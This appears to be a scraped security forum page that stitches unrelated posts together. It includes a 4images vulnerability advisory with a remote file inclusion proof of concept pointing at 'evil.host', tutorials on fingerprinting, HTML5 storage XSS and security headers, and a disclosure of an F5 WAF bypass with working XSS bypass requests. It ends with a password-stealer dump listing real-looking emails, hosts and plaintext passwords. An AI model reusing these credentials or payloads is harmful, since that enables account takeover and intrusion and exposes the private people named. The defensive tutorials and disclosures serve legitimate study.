Search the Community

Am nevoie de o aplicatie pentru Android ce ajuta la localizare,folosindu-se de GPS.Aplicatia este partial facuta. Pentru mai multe informatii astept sa fiu contactata.

| # Title : 4images 1.7.11 Multi Vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Dork : Powered by 4images 1.7.11 | # Tested on: windows 8.1 Français V.(Pro) | # Download : http://www.4homepages.de/ ======================================= Host Header Attack : Vulnerability description : An attacker can manipulate the Host header as seen by the web application and cause the application to behave in unexpected ways. Developers often resort to the exceedingly untrustworthy HTTP Host header (_SERVER["HTTP_HOST"] in PHP). Even otherwise-secure applications trust this value enough to write it to the page without HTML-encoding it with code equivalent to: <link href="http://_SERVER['HOST']" This vulnerability affects /4images/index.php. Host header evilhostKdK2IXPv.com was reflected inside a LINK tag (href attribute). Poc : http://127.0.0.1/4images/top.php/lightbox.php R/L File inclusion : C:\web\www\4images\global.php LIne 400 : include_once(ROOT_PATH.'includes/db_'.strtolower($db_servertype).'.php'); Function : include_once Variables : $db_servertype Poc : 127.0.0.1/4images/global.php?db_servertype=http://evil.host Greetz : jericho http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/ Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * exploit4arab.net --------------------------------------------------------------------------------------------------------------- Source

When performing a Web Application Security Assessment, an important step is Fingerprinting which allows for further exploitation by an attacker. So as a security researcher/pentester, we should do well at fingerprinting the web server, which gives lot of information like application name, software version, web server info, OS, and more. This helps for known vulnerabilities, researching vulnerabilities and exploiting. So here I will discuss some techniques which are required for this task: Finger Print Methodology How to perform this activity: obviously for an attacker there is no hard and fast rule to perform this operation. For pentesting we will discuss some methods below. HTTP Header Banner Grabbing The most basic form of identifying a web framework is to gather the basic architecture like application name and server banner which will be more helpful for banner grabbing. Banner grabbing by Netcat: So we got AkamaiGhost, which is a load balancer that prevents finger printing. Banner grabbing by Telnet: Here we got a lot of information about the application and server for further exploitation. By Nmap: Using some Nmap command we can also enumerate information about application and web server finger printing. If you want to know more about Nmap please click here. By sending a malformed HTTP Header request/Junk request Review by inspecting cookies Crawling cookies can reveal lots of information about the application. See the below example: Host: resources.infosecinstitute.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referrer: http://www.google.co.in/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CCYQjBAwAQ&url=http%3A%2F%2Fresources.infosecinstitute.com%2Fnmap-cheat-sheet%2F&ei=JCpCVaK1Mo-wuASe1YC4Cg&usg=AFQjCNFYlxcvuiEFw2QCg-9_e6R-M76_9Q&sig2=y9KWwXGOOQ_bVpfKw-fiaA&bvm=bv.92189499,d.c2E&cad=rja Cookie: __utma=192755314.2098953166.1427376874.1427376874.1427376874.1; __utmz=192755314.1427376874.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); visitor_id12882=216943492; __distillery=v20150227_1ce95eb6-6db3-422d-8dfe-497a0e3b3b7f; _ga=GA1.2.2098953166.1427376874; X-Mapping-fjhppofk=767BD7CA2B9E38F518B95F35B5326A01 Connection: keep-alive Automation and Tools Implementation Here we will discuss some of the tools which can be of further use for finger printing. We will discuss one by one. Whatweb: Currently Whatweb is the most important tool for finger printing in Kali Linux. It includes the below features: Text strings (case sensitive) Regular expressions Google Hack Database queries (limited set of keywords) MD5 hashes URL recognition HTML tag patterns Custom ruby code for passive and aggressive operations See the below screenshot. BlindElephant: Blind Elephant is an open-source generic web application finger printer that produces results by examining a small set of static files. Basically it is called static finger printing. It searches the file name for file extensions developed by the Python library and gives the finger print result. Fireup the below command to install: svn co https://blindelephant.svn.sourceforge.net/svnroot/blindelephant/trunk blindelephant Follow the below pictures: Scan the target with the below command: Plugin Support: With –p switch we can search for a plugin like the below command for WordPress: Blindelephant.py –s –p guess target plugin python BlindElephant.py -u target Actually it scans for static files, version no, config file. A best candidate for finger printing is by checking the checksum of the file like with the hashing method. Some others are below: Css file Js file .ini file En-GB ini file and many more Extending support for Python From a hacker’s perspective, we need customized finger printing and our function should support it. Though it is open source, we can do customization. Check the below snippet of code: $python >>> from blindelephant.Fingerprinters import WebAppFingerprinter >>> >>> #Construct the fingerprinter >>> #use default logger pointing to console; can pass "logger" arg to change output >>> fp = WebAppFingerprinter("http://laws.qualys.com", "movabletype") >>> #do the fingerprint; data becomes available as instance vars >>> fp.fingerprint() (same as above) >>> print "Possible versions:", fp.ver_list Possible versions: [LooseVersion ('4.22-en'), LooseVersion ('4.22-en-COM'), LooseVersion ('4.23-en'), LooseVersion ('4.23-en-COM')] >>> print "Max possible version: ", fp.best_guess Max possible version: 4.23-en-COM Wappalyzer Website: Wappalyzer Wapplyzer is a Firefox Chrome plug-in. It works only on regular expression matching and doesn’t need anything other than the page to be loaded on the browser. It works completely at the browser level and gives results in the form of icons. Sometimes it may a be false positive, so be careful when using this tool. Desenmascara.me This is online tool for extracting information. It reveals lots of info including web server info, application info and known vulnerabilities. httprint – the advanced HTTP fingerprinting engine This uses static analysis with a signature file that contains a different header file for different types of servers. ./httprint -s signatures.txt -o apache1.html -h apache.example.com s-signature for different http header o-output to a file h-host file HTTP Recon httprecon project / download This is all in one project which provides finger printing and reporting. It involves five tabs which help security testers to refine the results during finger printing. See the image below. We got lots of information from here. NetCraft Another all in one tool is NetCraft, which is an online tool. We can grab various information by using this tool. Netcraft Extension - Phishing Protection and Site Reports References An Introduction to HTTP Fingerprinting Wappalyzer http://blindelephant.sourceforge.net/ Source

Nektra SpyStudio is an all-in-one tool for cyber security analysts, DevOps, QA engineers, and developers. This multi-tool is useful for application virtualization, troubleshooting Windows applications, application performance monitoring, malware analysis, and as a process monitor complement. Get it now Read more at Nothing found for - | SharewareOnSale

In a previous article of mine, I discussed Cross Domain Messaging in HTML5. This article walks you through another feature, called local storage, and its security. Local Storage Local storage is one of the new features added in HTML5. It was first introduced in Mozilla 1.5 and eventually embraced by the HTML5 specification. We can use the local storage feature in HTML5 by using the JavaScript objects localStorage and sessionStorage. These objects allow us to store, retrieve and delete data based on name value pairs. The data processed using the localStorage object persists through browser shutdowns, while data created using the sessionStorage object will be cleared after the current browsing session. One important point to note is, this storage is origin-specific. This means that a site from a different origin cannot access the data stored in an application’s local database. Let me make it clear with a simple example. Below is a sample HTML5 application, which is capable of storing data using the local storage feature. We can also retrieve the data stored in the database using the “Show Data” button. Let us first observe the origin of this site. Let us assume that this is “Application A”. http://localhost:8383/ So here are the details: Name: Application A Origin: http://localhost:8383/ Let us click the Show Data button. We are able to access the data stored by this application in the database. That is expected. Now, let us try to access this data stored by application A from a different origin. Let us assume that this is Application B Here are the details: Name: Application B Origin: http://localhost/ Please note that the port number is different from Application A. Let us click the “Show Data” button. When I clicked “Show Data”, there seems to be nothing displayed on the web page. This is because this application is running on a different origin. Just to confirm, let us run a different application named “Application C” from the same origin as “Application A”. Here are the details. Name: Application C Origin: http://localhost:8383/ Let us click “Show Data” and observe the result. Nice! We are able to access the data from this application, since it is from the same origin as Application A. To conclude, I have used the same code in all the above examples but with different origins. We inserted data into the database using Application A. When we tried accessing it from Application B, it failed due to the same origin policy. Let us now see some attacks possible with HTML5 local storage. Storing Sensitive Data Developers may store sensitive information in these databases. It is possible to find API keys or similar sensitive data when working with APIs due to their statelessness. We can exploit them using an XSS vulnerability if there is no physical access to the device. Below is an example of how JavaScript’s localStorage object stores data. We can use the function setItem with some name-value pairs as parameters. localStorage.setItem(“data”, “mydata”); As we can see in the figure below, Chrome stores this data in the following path. We can programmatically read this data using JavaScript as shown below. localStorage.getItem(“data”); We can now go ahead and read this data from the SQLite database as shown below. Script Injection SQLite data, when not properly sanitized, may lead to script injection attacks. Let us see a simple example. Below is the same form we saw in the beginning of the article. Let us store some sample data and retrieve it back as shown below. If this data is not properly sanitized, it will lead to stored XSS Vulnerability as shown below. This time, let us enter the below piece of code into the message box. <img src=’X’ onerror=alert(1);> et us click the “Show Data” button and see the result. As we can see, it has popped up an alertbox due to the JavaScript we injected. Conclusion This article has discussed how the HTML5 local storage feature works and how Same Origin Policy restrictions are applied on the data being stored. Finally, we have had a look at some possible attacks on the HTML5 local storage feature. We will see other HTML5 features and possible attacks in later articles. Source

In this world of the web, we have seen various common attacks like XSS, Clickjacking, Session Hijacking, etc. Various HTTP headers are introduced to defend against these attacks in a simple and easy fashion. In this series of articles, we will see various headers available to protect against common web attacks and we will also see a practical approach of how to implement them in a simple PHP based application. The focus of this series is to give developers a practical touch of how these common attacks can be prevented just by using some HTTP headers. We will setup a vulnerable application to understand these headers in detail. Setting up the lab: You can download the code snippets and database file used in this application here: You can set up this PHP-MYSQL application in XAMPP or WAMP or LAMP or MAMP, depending upon your machine. In my case, I am using a Mac machine and thus using MAMP, and I kept all the files in a folder called “sample” inside my root directory. Application functionality: After setting up the sample application, launch the home page as shown below. http://localhost/sample/index.php As we can see in the above figure, this application has got a very simple login page where the user can enter his credentials. It has got basic server side validations as explained below. The user input fields cannot be empty. This is done using PHP’s empty() function. So, if a user doesn’t enter anything and clicks login, it throws a message as shown below. If the user enters wrong credentials, it throws a message as shown below. This is done after performing a check against user database. If the user enters correct username and password, it goes ahead and shows the home page for the user logged in. This is done using the MySQLi prepared statement as shown below. $stmt = $mysqli->prepare("select * from admin where username=? and password=?"); $stmt->bind_param("ss",$username,$password); $stmt->execute(); username: admin password: 1q2w3e4r5t Note: Please keep in mind that the given password is stored as SHA1 hash in this sample database. This is a common password and this SHA1 hash can be easily be cracked using some online tools. After logging in, a session is created for the user, and there is a simple form which is vulnerable to XSS. Now, let us fire up BurpSuite and just keep a note of the default headers that are set when we login to this application. This looks as shown below. HTTP/1.1 200 OK Date: Sun, 12 Apr 2015 13:59:23 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=17807aed72952730fd48c35ac8e58f9c; path=/ Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 If you clearly observe the above headers, there are no headers added to provide additional security to this application. We can also see the search field after logging in, which is accepting user input and echoing back to the user. Below is the code used to build the page being displayed after login. <?php session_start(); session_regenerate_id(); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Clickjacking prevention using X-Frame-Options header: The first concept that we will discuss is Clickjacking mitigation using X-Frame-Options. How does it work? Usually, an attacker loads a vulnerable page into an iframe to perform clickjacking attacks. In our case, we are going to load the user dashboard page into an iframe as shown below. This page appears after successful login. http://localhost/sample/home.php <!DOCTYPE html> <html> <head> <title>iframe</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> </head> <body> <iframe src="http://localhost/sample/home.php"></iframe> </body> </html> I saved this page as iframe.html on the same server. When we load this in a browser, the above URL will be loaded in an iframe as shown below. Though there are multiple ways to prevent this, we are going to discuss the X-Frame-Options header to keep the content of this article inline with the title. The X-Frame-Options header can be used with the following three values: DENY: Denies any resource from framing the target. SAMEORIGIN: Allows only resources that are part of the Same Origin Policy to frame the protected resource. ALLOW-FROM: Allows a single serialized-origin to frame the protected resource. This works only with Internet Explorer and Firefox. We will discuss each of these options in detail. X-Frame-Options: DENY Let us start with “X-Frame-Options: DENY”. Open up your home.php file and add the following line. header(“X-Frame-Options: DENY”); Now the modified code should look as shown below. <?php session_start(); session_regenerate_id(); header("X-Frame-Options: DENY"); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Logout from the application and re-login to observe the HTTP headers now. Below are the HTTP headers from the server after adding X-Frame-options header with the value DENY: HTTP/1.1 200 OK Date: Sun, 12 Apr 2015 14:14:51 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=9190740c224f78bb78998ff40e5247f3; path=/ X-Frame-Options: DENY Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 If you notice, there is an extra header added in the response from the server. If we reload the iframe now, the URL will not be loaded inside the iframe. This looks as shown below. Let us see the reason behind this by navigating to Chrome’s developer tools using the following path. Customize and Control Google Chrome -> More Tools -> Developer Tools\ As we can see in the above figure, this is because of the header we set in the server response. We can check the same in Firefox by using the Web Developer Extension as shown below. If we load the iframe.html page in Firefox, below is the error being displayed in the console. X-Frame-Options: SAMEORIGIN There may be scenarios where framing of this URL is required for this application. In such cases, we can allow framing from the same origin and prevent it from cross origin requests using the value “SAMEORIGIN” with X-Frame-Options header.\ Open up your home.php file and add the following line. header(“X-Frame-Options: sameorigin”);\ Now the modified code should look as shown below. <?php session_start(); session_regenerate_id(); header("X-Frame-Options: sameorigin"); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Logout from the application and re-login to observe the HTTP headers now. Below are the HTTP Headers from the server after adding X-Frame-options header with the value sameorigin: HTTP/1.1 200 OK Date: Sun, 12 Apr 2015 14:34:52 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=5f3d66b05f57d67c3c14158621dbba9e; path=/ X-Frame-Options: sameorigin Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Now, let us see how it works with different origins. First let us load the same iframe.html, which is hosted on the same server. As we can see in the figure below, we are able to load the page in the iframe without any problem. Now, I launched Kali Linux using Virtual Box and loaded this URL(http://localhost/sample/home.php)and placed the file on the server, which is a different origin for our current application. Below is the code snippet used on the Kali Linux machine to create iframe.html. When we launch this iframe.html file, it will not load due to the cross origin restriction by the server. We can see that in the error console of iceweasel browser in Kali Linux as shown below. The error clearly shows that the server does not allow cross-origin framing. X-Frame-Options: ALLOW-FROM http://www.site.com X-Frame-Options: ALLOW_FROM option allows a single serialized-origin to frame the target resource. This works only with Internet Explorer and Firefox. Let us see how this works. First, open up your home.php file and add the following line. header(“X-Frame-Options: ALLOW-FROM http://localhost”); Now the modified code should look as shown below. <?php session_start(); session_regenerate_id(); header("X-Frame-Options: ALLOW-FROM http://localhost"); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Let us logout from the application and re-login to check if the header is added. HTTP/1.1 200 OK Date: Mon, 13 Apr 2015 02:18:49 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=c8a5b9a76982ae38f0dde3f3bf3480f5; path=/ X-Frame-Options: ALLOW-FROM http://localhost Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 As we can see, the new header is added now. If we now try to load the iframe from the same server, it loads the page without any problem, as shown below. This is because http://localhost is allowed to load this URL. Now, let us try to change the header to something else and try reloading it again. Add the following line in home.php and observe the difference. header(“X-Frame-Options: ALLOW-FROM http://www.androidpentesting.com”); The modified code should look as shown below. <?php session_start(); session_regenerate_id(); header("X-Frame-Options: ALLOW-FROM http://www.androidpentesting.com"); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Following are the headers captured from BurpSuite. HTTP/1.1 200 OK Date: Mon, 13 Apr 2015 02:20:26 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=6a8686e1ab466a6c528d8a49a281c74e; path=/ X-Frame-Options: ALLOW-FROM http://www.androidpentesting.com Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 If we now refresh our previous link, it will not load the page in an iframe. If we observe the error console, it shows the following error. It is obvious that framing by http://localhost is not permitted. Conclusion In this article, we have seen the functionality of our vulnerable application and fixed the clickjacking vulnerability using X-Frame-Options header. We have also seen various options available with this header and how they differ from each other. The next article gives coverage of other security headers available. Source

Defense in depth is dead. The way you’re thinking about data center security is outdated. Security started changing long before Sony, Target and the others got hacked. The problem starts with your perimeter. During a conversation with Pete Lindstrom of IDC, we paused to consider the state of defense in depth. “Circling wagons is just impossible,”Pete said. “With apps strewn across the internet, if a corporation thinks they can build perimeter around all their apps then they are nuts.” By expanding the definition of cloud computing to include cloud-based accounting, CRM, email services, and development tools, people discover that their organizations have been using cloud for years, without fully realizing it. In 2014, IDC reported that 69% of enterprises worldwide have at least one application or a portion of their computing infrastructure in the cloud. In Europe, adoption is also growing but at a slightly slower rate, with 19% of EU enterprises using cloud computing in 2014, according to the European Union‘s Eurostat. Bottom line: more enterprise data is living outside of the protected data center. When your definition of defense in depth is adding layers of security to the data center perimeter and physical data segmentation, modern cloud applications are indeed insecure. Instead, the enterprise should focus on the application, data, and user as the important security layers. In a 2015 report from Accenture and the Ponemon Institute, the authors note that proactive organizations are prioritizing network traffic anomalies, identifying vulnerabilities and limiting unauthorized data sharing, while the “static” companies focus on employees’ device security and data backup. Let’s examine the Sony Pictures hack. The Sony hackers gained access through former employees’ accounts, and easily cracked the perimeter. The real damage occurred once they exploited the weak internal network security. All the critical applications – email servers, accounting data, and copyrighted motion pictures – were all connected “on a wire” inside the corporate network. The perimeter-heavy, fortify-the-exterior approach to security is indeed dead. In fact, when it fails to stop cybercrime, this strategy can cost you upwards of $100M. Each enterprise application should be considered critical and deserves its own perimeter inside any network environment. With Sony, or any organization, critical data means all data. For a manufacturer, critical data might be product designs as well as the obvious accounting and customer data. Plus, nearly 85% of insider attacks or “privilege misuse” attacks used the target enterprises’ corporate local area network (LAN), according to a 2014 Verizon security report. To truly guard and protect an application, enterprises need to control all data and network traffic via secure, encrypted switches at every layer within a network. Defense shouldn’t end at the data center pediment, but extend down to each individual application. Monitored access, encryption, and application-specific firewall rules can all but eliminate malicious “east/west” movement inside a network. This approach to application-specific defense in depth continues the concept of physical segmentation into “application segmentation.” Each application owner within an organization can dictate how traffic flows to each application server through an encrypted network switch. When data passes through a secure application perimeter, application owners can easily monitor and isolate traffic and prevent unauthorized access. Even with only basic interior firewall rules, this enterprise can protect themselves from a Sony-style data exploit. Source

Details ======= Product: F5 BIG-IP Application Security Manager (ASM) Vulnerability: Web Application Firewall Bypass Author: Peter Lapp, lappsec () gmail com CVE: None assigned Vulnerable Versions: Confirmed 11.4.0, 11.4.1. Should apply to all releases. Fixed Version: None Summary ======= The F5 ASM is a web application firewall designed to protect web applications from attacks. Due to the way that the system processes JSON content, it's possible to bypass the ASM using a crafted request to a URL that processes both JSON and regular URL encoded requests. The vendor has acknowledged that this is an issue and has indicated that a fix will be released sometime in the future, but doesn't have a time frame and it's not a priority. I decided to release the details so anyone with a vulnerable configuration is aware of the risk and can act accordingly. Technical Details ================= The problem is that the ASM's JSON parser does not normalize URL encoded content. So it will block <script>, but not %3cscript%3e. This is fine unless you have a JSON profile applied to a URL that also processes normal x-www-form-urlencoded POST requests. In this case, it's possible to trick the ASM into thinking the request is JSON, URL encode your payload, and slip it through to the application. Granted, this bypass is limited to a specific configuration, but it's really not that uncommon to have a JSON profile applied to a URL that also processes other data. Possible scenarios include a generic JSON catchall, one automatically created by the policy builder, or you may have a web application that uses parameter based navigation (page=json goes to one page, page=search goes to another). In any case, if you have a JSON profile applied to a URL that also handles POST requests with x-www-form-urlencoded content, you're vulnerable. First, in order to bypass the ASM, you have to trick it into thinking the request content is JSON. In F5's documentation (https://support.f5.com/kb/en-us/products/big-ip_asm/manuals/product/asm-implementations-11-4-0/14.html), they recommend matching *json* in the Content-Type header. This is easily tricked by setting the header to "Content-Type: application/x-www-form-urlencoded; charset=UTF-8;json". I then tested setting it to only match on application/json, but that was still tricked by dual content-type headers: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Type: application/json The application (running on Tomcat) processed the request as urlencoded, but the ASM processed it as JSON. >From here, passing through a malicious payload depends on the violations that are enabled on the security profile. If Malformed JSON is NOT enabled, you can just tag "json" onto the end of the content header(or double the header), URL encode special characters in your payload and send it away. In this case, a request like the following would not be blocked: POST / HTTP/1.1 Host: x.x.x.x Connection: keep-alive Content-Length: 168 Content-Type: application/x-www-form-urlencoded; charset=UTF-8;json search=%3cimg+src%3dx+onerror%3alert%280%29%3e If Malformed JSON violations are enabled, then the payload has to be valid JSON. A request like the one below will get past that. It's not pretty but it works. This request will get past the ASM with all the bells and whistles enabled. POST / HTTP/1.1 Host: x.x.x.x Connection: keep-alive Content-Length: 168 Content-Type: application/x-www-form-urlencoded; charset=UTF-8;json {"junkparam=&search=%3cimg+src%3dx+onerror%3dalert%280%29%3e&junkparam2=":"junk"} The ASM parses that as JSON and it is well formed so there aren't any errors. But the application is processing it as x-www-form-urlencoded so {"junkparam is just treated as a regular parameter name and the second parameter with the payload in it gets through. The last parameter is there just to close out the JSON format. Also, because JSON profiles don't check for meta characters in parameter names, it doesn't trigger an Illegal meta character in parameter name violation. If the payload looked like this {"param":"junkparam=&locationFilter=%3cimg+src%3dx+onerror%3dalert%280%29%3e&junkparam2="} then it would still get through but only if the illegal meta character in value violation was not set to block. Right now there is no fix for this issue and I haven't been able to find a way to block a request like the one above from getting through. I consulted F5's engineers and they said this was by design and there's no way to block it as of now. There will be a fix for this in the future, but until then make sure that your ASM profiles are as explicit as possible and you have compensating security controls for any URLs that this bypass would apply to. It's just another reason not to use a WAF as a band-aid for a vulnerable application! Feel free to contact me if you have any questions or additional information to add to this. Timeline ======== 1/19/2015 - Reported the issue to the vendor 2/26/2015 - The vendor confirms that it's a valid problem but are not going to release a fix in the near term. 3/13/2015 - Vendor product development creates ID 511951 to track the problem and consider adding a fix in a future major release. 5/5/2015 - Released info to FD. Source

Application: Google Chrome Host: https://www.dyndn.es/ Username: Fastnet@walla.com Password: Ratte113 Application: Google Chrome Host: https://www.dropbox.com/de/ Username: fastnet112@googlemail.com Password: Ratte112 Application: Google Chrome Host: http://192.168.100.2...namic_DNS.shtml Username: fastnet@walla.com Password: Ratte113 Application: Google Chrome Host: https://crytecsbs.local/Remote/logon Username: fastnet Password: Ratte112 Application: Google Chrome Host: https://accounts.goo...om/ServiceLogin Username: fastnet112@googlemail.com Password: Melissa78 Application: Google Chrome Host: https://192.168.100....ebman/index.cgi Username: admin Password: ratte112 Application: Google Chrome Host: https://192.168.100..../administrator/ Username: admin Password: 663852 Application: Google Chrome Host: https://192.168.100.140/Remote/logon Username: fastnet Password: Ratte112 Application: Google Chrome Host: http://www.iapphacks.com/ucp.php Username: Ratte112 Password: ratte112 Application: Google Chrome Host: https://www.dyndn.es/ Username: fastnet Password: Ratte113 Application: Google Chrome Host: https://tipido.com/g...space-anmelden/ Username: Fastnet@walla.com Password: Somm3r2013 Application: Google Chrome Host: http://www.lima-city.de/login Username: vipx Password: Somm3r2013 Application: Google Chrome Host: https://myds.synolog...rt/register.php Username: Fastnet@walla.com Password: Ratte113 Application: Google Chrome Host: http://www.x.gg/login Username: Fastnet@walla.com Password: YYCUvqEl Application: Google Chrome Host: http://85.214.72.143/fastnet/ Username: fastnet Password: hund88 Application: Google Chrome Host: https://www.facebook.com/login.php Username: Fastnet@walla.com Password: Melissa78+ Application: Google Chrome Host: http://vipx.square7.ch/administrator/ Username: admin Password: Somm3r2013 Application: Google Chrome Host: https://accounts.goo...om/ServiceLogin Username: Fastnet112@googlemail.com Password: Melissa78 Application: Google Chrome Host: https://warframe.com/signup Username: Fastnet Password: monster112 Application: Google Chrome Host: http://phpmyadmin.vi...e7.ch/index.php Username: vipx Password: vipx Application: Google Chrome Host: https://friends.walla.co.il/ Username: Fastnet Password: Ratte112 Application: Google Chrome Host: https://myds.synolog...ter_account.php Username: Fastnet@walla.com Password: 87654321 Application: Google Chrome Host: https://battlelog.ba...bf3/de/servers/ Username: Fastnet112@googlemail.com Password: Ratte112 Application: Google Chrome Host: http://192.168.100.1...admin/index.php Username: root Password: ratte112 Application: Google Chrome Host: http://battlelog.bat...om/all/de/gate/ Username: fastnet112@googlemail.com Password: Ratte112 Application: Google Chrome Host: https://www.amazon.de/ap/signin Username: antjemy@web.de Password: skellerup Application: Google Chrome Host: https://www.starstab...om/de/myaccount Username: antjemy@web.de Password: lotta1409 ========================== ate/Time: 23.01.2015 09:28:54 PC Name: CHRIS-THINK Windows Version: Windows 7 / Vista Application: FileZilla Host: iface.ff.lan Port: 22 Username: root Password: isitaplane Application: Google Chrome Host: http://helpdesk.blue...hilfe-anfordern Username: domi Password: domi Application: Google Chrome Host: http://www.grupo-max.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://test2.bluepoi.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: 